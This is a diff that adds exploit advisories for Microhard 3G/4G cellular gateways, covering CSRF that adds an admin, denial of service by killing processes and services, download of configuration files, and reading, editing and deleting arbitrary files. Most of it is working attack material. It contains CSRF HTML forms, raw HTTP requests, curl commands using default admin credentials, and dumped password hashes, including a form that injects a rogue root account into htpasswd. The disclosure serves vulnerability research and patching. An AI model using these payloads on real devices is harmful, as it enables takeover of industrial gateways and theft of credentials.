|
<input type="hidden" name="Tools_NetworkTraffic" value="0" />
|
||||||
|
<input type="hidden" name="VPN_enable" value="0" />
|
||||||
|
<input type="hidden" name="VPN_Summary" value="0" />
|
||||||
|
<input type="hidden" name="VPN_GatewayToGateway" value="0" />
|
||||||
|
<input type="hidden" name="VPN_ClientToGateway" value="0" />
|
||||||
|
<input type="hidden" name="VPN_VPNClientAccess" value="0" />
|
||||||
|
<input type="hidden" name="VPN_CertificateManagement" value="0" />
|
||||||
|
<input type="hidden" name="VPN_CiscoEasyVPNClient" value="0" />
|
||||||
|
<input type="submit" value="Change" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
|
||||||
|
CSRF Add Admin:
|
||||||
|
---------------
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form action="http://192.168.1.1/cgi-bin/webif/system-acl.sh" method="POST" enctype="multipart/form-data">
|
||||||
|
<input type="hidden" name="submit" value="1" />
|
||||||
|
<input type="hidden" name="pw1" value="" />
|
||||||
|
<input type="hidden" name="pw2" value="" />
|
||||||
|
<input type="hidden" name="user_add" value="testingus" />
|
||||||
|
<input type="hidden" name="password_add" value="123456" />
|
||||||
|
<input type="hidden" name="password2_add" value="123456" />
|
||||||
|
<input type="hidden" name="Carrier_enable" value="1" />
|
||||||
|
<input type="hidden" name="Carrier_Status" value="1" />
|
||||||
|
<input type="hidden" name="Carrier_Settings" value="1" />
|
||||||
|
<input type="hidden" name="Carrier_Keepalive" value="1" />
|
||||||
|
<input type="hidden" name="Carrier_TrafficWatchdog" value="1" />
|
||||||
|
<input type="hidden" name="Carrier_DynamicDNS" value="1" />
|
||||||
|
<input type="hidden" name="Carrier_SMSConfig" value="1" />
|
||||||
|
<input type="hidden" name="Carrier_SMS" value="1" />
|
||||||
|
<input type="hidden" name="Carrier_DataUsage" value="1" />
|
||||||
|
<input type="hidden" name="Comport_enable" value="1" />
|
||||||
|
<input type="hidden" name="Comport_Status" value="1" />
|
||||||
|
<input type="hidden" name="Comport_Com0" value="1" />
|
||||||
|
<input type="hidden" name="Comport_Com1" value="1" />
|
||||||
|
<input type="hidden" name="Firewall_enable" value="1" />
|
||||||
|
<input type="hidden" name="Firewall_Status" value="1" />
|
||||||
|
<input type="hidden" name="Firewall_General" value="1" />
|
||||||
|
<input type="hidden" name="Firewall_Rules" value="1" />
|
||||||
|
<input type="hidden" name="Firewall_PortForwarding" value="1" />
|
||||||
|
<input type="hidden" name="Firewall_MACIPList" value="1" />
|
||||||
|
<input type="hidden" name="Firewall_Reset" value="1" />
|
||||||
|
<input type="hidden" name="GPS_enable" value="1" />
|
||||||
|
<input type="hidden" name="GPS_Location" value="1" />
|
||||||
|
<input type="hidden" name="GPS_Settings" value="1" />
|
||||||
|
<input type="hidden" name="GPS_Report" value="1" />
|
||||||
|
<input type="hidden" name="GPS_GpsGate" value="1" />
|
||||||
|
<input type="hidden" name="GPS_Recorder" value="1" />
|
||||||
|
<input type="hidden" name="GPS_LoadRecord" value="1" />
|
||||||
|
<input type="hidden" name="I/O_enable" value="1" />
|
||||||
|
<input type="hidden" name="I/O_Status" value="1" />
|
||||||
|
<input type="hidden" name="I/O_OUTPUT" value="1" />
|
||||||
|
<input type="hidden" name="Network_enable" value="1" />
|
||||||
|
<input type="hidden" name="Network_Status" value="1" />
|
||||||
|
<input type="hidden" name="Network_LAN" value="1" />
|
||||||
|
<input type="hidden" name="Network_Routes" value="1" />
|
||||||
|
<input type="hidden" name="Network_GRE" value="1" />
|
||||||
|
<input type="hidden" name="Network_PIMSM" value="1" />
|
||||||
|
<input type="hidden" name="Network_SNMP" value="1" />
|
||||||
|
<input type="hidden" name="Network_sdpServer" value="1" />
|
||||||
|
<input type="hidden" name="Network_LocalMonitor" value="1" />
|
||||||
|
<input type="hidden" name="Network_Port" value="1" />
|
||||||
|
<input type="hidden" name="System_enable" value="1" />
|
||||||
|
<input type="hidden" name="System_Settings" value="1" />
|
||||||
|
<input type="hidden" name="System_AccessControl" value="1" />
|
||||||
|
<input type="hidden" name="System_Services" value="1" />
|
||||||
|
<input type="hidden" name="System_Maintenance" value="1" />
|
||||||
|
<input type="hidden" name="System_Reboot" value="1" />
|
||||||
|
<input type="hidden" name="Tools_enable" value="1" />
|
||||||
|
<input type="hidden" name="Tools_Discovery" value="1" />
|
||||||
|
<input type="hidden" name="Tools_NetflowReport" value="1" />
|
||||||
|
<input type="hidden" name="Tools_NMSSettings" value="1" />
|
||||||
|
<input type="hidden" name="Tools_EventReport" value="1" />
|
||||||
|
<input type="hidden" name="Tools_Modbus" value="1" />
|
||||||
|
<input type="hidden" name="Tools_Websocket" value="1" />
|
||||||
|
<input type="hidden" name="Tools_SiteSurvey" value="1" />
|
||||||
|
<input type="hidden" name="Tools_Ping" value="1" />
|
||||||
|
<input type="hidden" name="Tools_TraceRoute" value="1" />
|
||||||
|
<input type="hidden" name="Tools_NetworkTraffic" value="1" />
|
||||||
|
<input type="hidden" name="VPN_enable" value="1" />
|
||||||
|
<input type="hidden" name="VPN_Summary" value="1" />
|
||||||
|
<input type="hidden" name="VPN_GatewayToGateway" value="1" />
|
||||||
|
<input type="hidden" name="VPN_ClientToGateway" value="1" />
|
||||||
|
<input type="hidden" name="VPN_VPNClientAccess" value="1" />
|
||||||
|
<input type="hidden" name="VPN_CertificateManagement" value="1" />
|
||||||
|
<input type="hidden" name="VPN_CiscoEasyVPNClient" value="1" />
|
||||||
|
<input type="hidden" name="mhadd_user" value="Add User" />
|
||||||
|
<input type="submit" value="Request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
114
exploits/hardware/webapps/45035.txt
Normal file
114
exploits/hardware/webapps/45035.txt
Normal file
|
@ -0,0 +1,114 @@
|
||||||
|
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Service Control DoS
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Microhard Systems Inc.
|
||||||
|
Product web page: http://www.microhardcorp.com
|
||||||
|
Affected version: IPn4G 1.1.0 build 1098
|
||||||
|
IPn3Gb 2.2.0 build 2160
|
||||||
|
IPn4Gb 1.1.6 build 1184-14
|
||||||
|
IPn4Gb 1.1.0 Rev 2 build 1090-2
|
||||||
|
IPn4Gb 1.1.0 Rev 2 build 1086
|
||||||
|
Bullet-3G 1.2.0 Rev A build 1032
|
||||||
|
VIP4Gb 1.1.6 build 1204
|
||||||
|
VIP4G 1.1.6 Rev 3.0 build 1184-14
|
||||||
|
VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
|
||||||
|
IPn3Gii / Bullet-3G 1.2.0 build 1076
|
||||||
|
IPn4Gii / Bullet-LTE 1.2.0 build 1078
|
||||||
|
BulletPlus 1.3.0 build 1036
|
||||||
|
Dragon-LTE 1.1.0 build 1036
|
||||||
|
|
||||||
|
Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
|
||||||
|
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
|
||||||
|
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
|
||||||
|
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
|
||||||
|
RS232/485/422 devices!
|
||||||
|
|
||||||
|
The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
|
||||||
|
the widespread deployment of cellular network infrastructure for critical data collection.
|
||||||
|
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
|
||||||
|
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
|
||||||
|
provides robust and secure wireless communication of Serial, USB and Ethernet data.
|
||||||
|
|
||||||
|
The all new Bullet-3G provides a compact, robust, feature packed industrial strength
|
||||||
|
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
|
||||||
|
to the next level by providing features such as Ethernet with PoE, RS232 Serial port
|
||||||
|
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
|
||||||
|
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
|
||||||
|
worth looking at!
|
||||||
|
|
||||||
|
The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
|
||||||
|
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
|
||||||
|
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
|
||||||
|
system integration and design flexibility with dual Ethernet Ports and high power
|
||||||
|
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
|
||||||
|
Control Lists, the Dragon-LTE provides a solution for any cellular application!
|
||||||
|
|
||||||
|
The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
|
||||||
|
network infrastructure for critical data communications. The VIP4Gb provides simultaneous
|
||||||
|
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
|
||||||
|
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
|
||||||
|
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
|
||||||
|
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
|
||||||
|
|
||||||
|
Desc: There is an undocumented and hidden feature that allows an authenticated attacker
|
||||||
|
to list running processes in the operating system and send arbitrary signals to kill
|
||||||
|
any process running in the background including starting and stopping system services.
|
||||||
|
This impacts availability and can be triggered also by CSRF attacks that requires device
|
||||||
|
restart and/or factory reset to rollback malicious changes.
|
||||||
|
|
||||||
|
Tested on: httpd-ssl-1.0.0
|
||||||
|
Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2018-5481
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5481.php
|
||||||
|
|
||||||
|
|
||||||
|
13.03.2018
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
POST /cgi-bin/webif/status-processes.sh HTTP/1.1
|
||||||
|
Host: 192.168.1.1
|
||||||
|
Connection: keep-alive
|
||||||
|
Content-Length: 34
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
Authorization: Basic YWRtaW46YWRtaW4=
|
||||||
|
Origin: http://166.130.177.150
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
||||||
|
Referer: http://192.168.1.1/cgi-bin/webif/status-processes.sh
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: en-US,en;q=0.9
|
||||||
|
Cookie: style=null
|
||||||
|
|
||||||
|
signal=SIGILL&pid=1337&kill=+Send+
|
||||||
|
|
||||||
|
|
||||||
|
===
|
||||||
|
|
||||||
|
|
||||||
|
Available services:
|
||||||
|
|
||||||
|
# ls /etc/init.d/
|
||||||
|
boot dmesgbackup gpsgatetr ipsecfwadd mh_product quagga sysctl vlan
|
||||||
|
checksync dnsmasq gpsr keepalive modbusd rcS systemmode vnstat
|
||||||
|
coova-chilli done gpsrecorderd led msmscomd salertd telnet watchdog
|
||||||
|
cron dropbear gred ledcon msshc sdpServer timezone webif
|
||||||
|
crontab eurd httpd localmonitord network snmpd twatchdog webiffirewalllog
|
||||||
|
custom-user-startup firewall ioports logtrigger ntpclient soip umount websockserverd
|
||||||
|
datausemonitord force_reboot iperf lte ntrd soip2 updatedd wsClient
|
||||||
|
defconfig ftpd ipsec lteshutdown nxl2tpd-wan soip2.getty usb xl2tpd
|
||||||
|
dhcp_client gpsd ipsec_vpn media_ctrl pimd soipd1 vcad xl2tpd-wan
|
||||||
|
|
||||||
|
|
||||||
|
Stop the HTTPd:
|
||||||
|
|
||||||
|
GET http://192.168.1.1/cgi-bin/webif/system-services.sh?service=httpd&action=stop HTTP/1.1
|
144
exploits/hardware/webapps/45036.txt
Normal file
144
exploits/hardware/webapps/45036.txt
Normal file
|
@ -0,0 +1,144 @@
|
||||||
|
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Configuration Download
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Microhard Systems Inc.
|
||||||
|
Product web page: http://www.microhardcorp.com
|
||||||
|
Affected version: IPn4G 1.1.0 build 1098
|
||||||
|
IPn3Gb 2.2.0 build 2160
|
||||||
|
IPn4Gb 1.1.6 build 1184-14
|
||||||
|
IPn4Gb 1.1.0 Rev 2 build 1090-2
|
||||||
|
IPn4Gb 1.1.0 Rev 2 build 1086
|
||||||
|
Bullet-3G 1.2.0 Rev A build 1032
|
||||||
|
VIP4Gb 1.1.6 build 1204
|
||||||
|
VIP4G 1.1.6 Rev 3.0 build 1184-14
|
||||||
|
VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
|
||||||
|
IPn3Gii / Bullet-3G 1.2.0 build 1076
|
||||||
|
IPn4Gii / Bullet-LTE 1.2.0 build 1078
|
||||||
|
BulletPlus 1.3.0 build 1036
|
||||||
|
Dragon-LTE 1.1.0 build 1036
|
||||||
|
|
||||||
|
Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
|
||||||
|
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
|
||||||
|
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
|
||||||
|
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
|
||||||
|
RS232/485/422 devices!
|
||||||
|
|
||||||
|
The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
|
||||||
|
the widespread deployment of cellular network infrastructure for critical data collection.
|
||||||
|
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
|
||||||
|
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
|
||||||
|
provides robust and secure wireless communication of Serial, USB and Ethernet data.
|
||||||
|
|
||||||
|
The all new Bullet-3G provides a compact, robust, feature packed industrial strength
|
||||||
|
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
|
||||||
|
to the next level by providing features such as Ethernet with PoE, RS232 Serial port
|
||||||
|
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
|
||||||
|
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
|
||||||
|
worth looking at!
|
||||||
|
|
||||||
|
The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
|
||||||
|
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
|
||||||
|
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
|
||||||
|
system integration and design flexibility with dual Ethernet Ports and high power
|
||||||
|
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
|
||||||
|
Control Lists, the Dragon-LTE provides a solution for any cellular application!
|
||||||
|
|
||||||
|
The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
|
||||||
|
network infrastructure for critical data communications. The VIP4Gb provides simultaneous
|
||||||
|
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
|
||||||
|
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
|
||||||
|
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
|
||||||
|
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
|
||||||
|
|
||||||
|
Desc: The system backup configuration file 'IPn4G.config' in '/' directory or its respective
|
||||||
|
name based on the model name including the similar files in '/www/cgi-bin/system.conf', '/tmp'
|
||||||
|
and the cli.conf in '/etc/m_cli/' can be downloaded by an authenticated attacker in certain
|
||||||
|
circumstances. This will enable the attacker to disclose sensitive information and help her
|
||||||
|
in authentication bypass, privilege escalation and/or full system access.
|
||||||
|
|
||||||
|
Tested on: httpd-ssl-1.0.0
|
||||||
|
Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2018-5484
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5484.php
|
||||||
|
|
||||||
|
|
||||||
|
13.03.2018
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
/etc/m_cli/cli.conf:
|
||||||
|
--------------------
|
||||||
|
|
||||||
|
curl "http://192.168.1.1/cgi-bin/webif/download.sh?script=/cgi-bin/webif/system-editor.sh&path=/etc/m_cli&savefile=cli.conf" -H "Authorization: Basic YWRtaW46YWRtaW4=" |grep passwd
|
||||||
|
% Total % Received % Xferd Average Speed Time Time Time Current
|
||||||
|
Dload Upload Total Spent Left Speed
|
||||||
|
100 2719 100 2719 0 0 2574 0 0:00:01 0:00:01 --:--:-- 2577
|
||||||
|
passwd admin
|
||||||
|
|
||||||
|
|
||||||
|
/www/IPn4G.config:
|
||||||
|
------------------
|
||||||
|
|
||||||
|
lqwrm@metalgear:~$ curl http://192.168.1.1/IPn4G.config -o IPn4G.tar.gz -H "Authorization: Basic YWRtaW46YWRtaW4="
|
||||||
|
% Total % Received % Xferd Average Speed Time Time Time Current
|
||||||
|
Dload Upload Total Spent Left Speed
|
||||||
|
100 13156 100 13156 0 0 9510 0 0:00:01 0:00:01 --:--:-- 9512
|
||||||
|
lqwrm@metalgear:~$ tar -zxf IPn4G.tar.gz ; ls
|
||||||
|
config.boardinfo config.boardtype config.date config.name etc IPn4G.tar.gz usr
|
||||||
|
lqwrm@metalgear:~$ cat config.boardinfo config.boardtype config.date config.name
|
||||||
|
2012 Microhard Systems Inc.:IPn4Gb-IPn4G:v1.0.0
|
||||||
|
Atheros AR7130 rev 2
|
||||||
|
Thu Jul 12 12:42:42 PDT 2018
|
||||||
|
IPn4G
|
||||||
|
lqwrm@metalgear:~$ cat usr/lib/hardware_desc
|
||||||
|
modem_type="N930"
|
||||||
|
LTE_ATCOMMAND_PORT="/dev/ttyACM0"
|
||||||
|
LTE_DIAG_PORT=""
|
||||||
|
LTE_GPS_PORT=""
|
||||||
|
wificard = "0"
|
||||||
|
lqwrm@metalgear:~$ ls etc/
|
||||||
|
config crontabs dropbear ethers firewall.user hosts httpd.conf passwd ssl
|
||||||
|
lqwrm@metalgear:~$ ls etc/config/
|
||||||
|
comport dhcp gpsgatetr iperf modbusd notes sdpServer twatchdog webif_access_control
|
||||||
|
comport2 dropbear gpsr ipsec msmscomd ntpclient snmpd updatedd websockserver
|
||||||
|
coova-chilli ethernet gpsrecorderd keepalive msshc ntrd snmpd.conf vlan wireless
|
||||||
|
cron eurd gre-tunnels localmonitor network pimd system vnstat wsclient
|
||||||
|
crontabs firewall httpd lte network_IPnVTn3G ping timezone vpnc
|
||||||
|
datausemonitor gpsd ioports lte362 network_VIP4G salertd tmpstatus webif
|
||||||
|
lqwrm@metalgear:~$ cat etc/passwd
|
||||||
|
root:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash
|
||||||
|
admin:$1$0VKXa1iD$.Jw20V3iH3kx6VSLjsFZP.:0:0:admin:/:/etc/m_cli/m_cli.sh
|
||||||
|
upgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false
|
||||||
|
at:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI
|
||||||
|
nobody:*:65534:65534:nobody:/var:/bin/false
|
||||||
|
testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh
|
||||||
|
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh
|
||||||
|
testingus:$1$S9c8yiFq$P96OckXNQMhpKjFoRx1sL.:1000:1000:Linux User,,,:/home/testingus:/bin/false
|
||||||
|
msshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh
|
||||||
|
|
||||||
|
|
||||||
|
/www/cgi-bin/system.conf:
|
||||||
|
-------------------------
|
||||||
|
|
||||||
|
lqwrm@metalgear:~$ curl -O http://192.168.1.1/cgi-bin/system.conf -H "Authorization: Basic YWRtaW46YWRtaW4="
|
||||||
|
lqwrm@metalgear:~$ cat system.conf |grep -irnH "password" -A2
|
||||||
|
system.conf:236:#VPN Admin Password:
|
||||||
|
system.conf-237-NetWork_IP_VPN_Passwd=admin
|
||||||
|
system.conf-238-
|
||||||
|
--
|
||||||
|
system.conf:309:#V3 Authentication Password:
|
||||||
|
system.conf:310:NetWork_SNMP_V3_Auth_Password=00000000
|
||||||
|
system.conf-311-
|
||||||
|
system.conf:312:#V3 Privacy Password:
|
||||||
|
system.conf:313:NetWork_SNMP_V3_Privacy_Password=00000000
|
||||||
|
|
||||||
|
|
||||||
|
Login to FTP (upgrade:admin). In /tmp/ or /tmp/upgrade/ the system.conf (gzipped) is located.
|
||||||
|
---------------------------------------------------------------------------------------------
|
139
exploits/hardware/webapps/45037.txt
Normal file
139
exploits/hardware/webapps/45037.txt
Normal file
|
@ -0,0 +1,139 @@
|
||||||
|
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Arbitrary File Attacks
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Microhard Systems Inc.
|
||||||
|
Product web page: http://www.microhardcorp.com
|
||||||
|
Affected version: IPn4G 1.1.0 build 1098
|
||||||
|
IPn3Gb 2.2.0 build 2160
|
||||||
|
IPn4Gb 1.1.6 build 1184-14
|
||||||
|
IPn4Gb 1.1.0 Rev 2 build 1090-2
|
||||||
|
IPn4Gb 1.1.0 Rev 2 build 1086
|
||||||
|
Bullet-3G 1.2.0 Rev A build 1032
|
||||||
|
VIP4Gb 1.1.6 build 1204
|
||||||
|
VIP4G 1.1.6 Rev 3.0 build 1184-14
|
||||||
|
VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
|
||||||
|
IPn3Gii / Bullet-3G 1.2.0 build 1076
|
||||||
|
IPn4Gii / Bullet-LTE 1.2.0 build 1078
|
||||||
|
BulletPlus 1.3.0 build 1036
|
||||||
|
Dragon-LTE 1.1.0 build 1036
|
||||||
|
|
||||||
|
Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
|
||||||
|
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
|
||||||
|
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
|
||||||
|
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
|
||||||
|
RS232/485/422 devices!
|
||||||
|
|
||||||
|
The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
|
||||||
|
the widespread deployment of cellular network infrastructure for critical data collection.
|
||||||
|
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
|
||||||
|
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
|
||||||
|
provides robust and secure wireless communication of Serial, USB and Ethernet data.
|
||||||
|
|
||||||
|
The all new Bullet-3G provides a compact, robust, feature packed industrial strength
|
||||||
|
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
|
||||||
|
to the next level by providing features such as Ethernet with PoE, RS232 Serial port
|
||||||
|
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
|
||||||
|
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
|
||||||
|
worth looking at!
|
||||||
|
|
||||||
|
The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
|
||||||
|
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
|
||||||
|
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
|
||||||
|
system integration and design flexibility with dual Ethernet Ports and high power
|
||||||
|
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
|
||||||
|
Control Lists, the Dragon-LTE provides a solution for any cellular application!
|
||||||
|
|
||||||
|
The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
|
||||||
|
network infrastructure for critical data communications. The VIP4Gb provides simultaneous
|
||||||
|
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
|
||||||
|
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
|
||||||
|
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
|
||||||
|
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
|
||||||
|
|
||||||
|
Desc: Due to the hidden and undocumented File Editor (Filesystem Browser) shell script
|
||||||
|
'system-editor.sh' an attacker can leverage this issue to read, modify or delete arbitrary
|
||||||
|
files on the system. Input passed thru the 'path' and 'savefile', 'edit' and 'delfile' GET
|
||||||
|
and POST parameters is not properly sanitized before being used to modify files. This can
|
||||||
|
be exploited by an authenticated attacker to read or modify arbitrary files on the affected
|
||||||
|
system.
|
||||||
|
|
||||||
|
Tested on: httpd-ssl-1.0.0
|
||||||
|
Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2018-5485
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5485.php
|
||||||
|
|
||||||
|
|
||||||
|
13.03.2018
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
Download (script):
|
||||||
|
------------------
|
||||||
|
# curl "http://192.168.1.1/cgi-bin/webif/download.sh?script=/cgi-bin/webif/system-editor.sh&path=/etc&savefile=passwd" -H "Authorization: Basic YWRtaW46YWRtaW4="
|
||||||
|
root:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash
|
||||||
|
admin:$1$0VKXa1iD$.Jw20V3iH3kx6VSLjsFZP.:0:0:admin:/:/etc/m_cli/m_cli.sh
|
||||||
|
upgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false
|
||||||
|
at:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI
|
||||||
|
nobody:*:65534:65534:nobody:/var:/bin/false
|
||||||
|
testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh
|
||||||
|
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh
|
||||||
|
testingus:$1$S9c8yiFq$P96OckXNQMhpKjFoRx1sL.:1000:1000:Linux User,,,:/home/testingus:/bin/false
|
||||||
|
msshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh
|
||||||
|
|
||||||
|
|
||||||
|
Edit (edit):
|
||||||
|
------------
|
||||||
|
CSRF add roOt:rewt to htpasswd:
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form action="http://192.168.1.1/cgi-bin/webif/system-editor.sh" method="POST" enctype="multipart/form-data">
|
||||||
|
<input type="hidden" name="path" value="/etc" />
|
||||||
|
<input type="hidden" name="edit" value="htpasswd" />
|
||||||
|
<input type="hidden" name="filecontent" value="root:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/
|
||||||
|
admin:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1
|
||||||
|
at:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/
|
||||||
|
testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.
|
||||||
|
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
|
||||||
|
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
|
||||||
|
roOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0" />
|
||||||
|
<input type="hidden" name="save" value=" Save Changes " />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
|
||||||
|
Delete (delfile):
|
||||||
|
-----------------
|
||||||
|
|
||||||
|
GET /cgi-bin/webif/system-editor.sh?path=/www&delfile=pwn.txt HTTP/1.1
|
||||||
|
|
||||||
|
|
||||||
|
Or edit and remove sanitization:
|
||||||
|
File: /usr/lib/webif/sanitize.awk
|
||||||
|
|
||||||
|
// { _str=$0;
|
||||||
|
gsub(/ /,"",_str)
|
||||||
|
gsub(/\|/,"",_str)
|
||||||
|
gsub(/\\/,"",_str)
|
||||||
|
gsub(/&/,"",_str)
|
||||||
|
gsub(/\^/,"",_str)
|
||||||
|
gsub(/\$/,"",_str)
|
||||||
|
gsub(/'/,"",_str)
|
||||||
|
gsub(/"/,"",_str)
|
||||||
|
gsub(/`/,"",_str)
|
||||||
|
gsub(/\{/,"",_str)
|
||||||
|
gsub(/\}/,"",_str)
|
||||||
|
gsub(/\(/,"",_str)
|
||||||
|
gsub(/\)/,"",_str)
|
||||||
|
gsub(/;/,"",_str)
|
||||||
|
print _str
|
||||||
|
}
|
